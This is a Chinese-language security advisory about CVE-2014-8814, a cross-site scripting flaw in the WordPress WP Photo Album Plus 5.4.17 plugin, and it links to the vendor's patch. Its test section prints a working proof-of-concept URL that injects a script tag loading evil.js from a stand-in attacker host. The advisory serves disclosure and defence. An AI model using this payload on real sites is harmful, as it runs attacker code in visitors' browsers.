当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

WordPress WP Photo Album Plus插件跨站脚本漏洞(CVE-2014-8814)

     发表日期:2014-12-05 09:52:30

WordPress WP Photo Album Plus插件跨站脚本漏洞(CVE-2014-8814)

BugTraq-ID:71263

CVE-ID:CVE-2014-8814

发布日期:2014-11-24

更新日期:2014-11-25

受影响系统:

WordPress WP Photo Album Plus 5.4.17

详细信息:

WP Photo Album Plus是管理和显示相册和幻灯片的插件。 WP Photo Album Plus插件在实现上存在跨站脚本漏洞,攻击者可利用此漏洞在受影响站点用户浏览器中执行任意脚本代码。

来源: Kacper Szurek

测试方法:

警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/wp-admin/admin.php?page=wppa_photo_of_the_day&walbum="><script src=http://attacker-url/evil.js></script>

解决办法:

厂商补丁:

WordPress

---------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://wordpress.org/plugins/wp-photo-album-plus/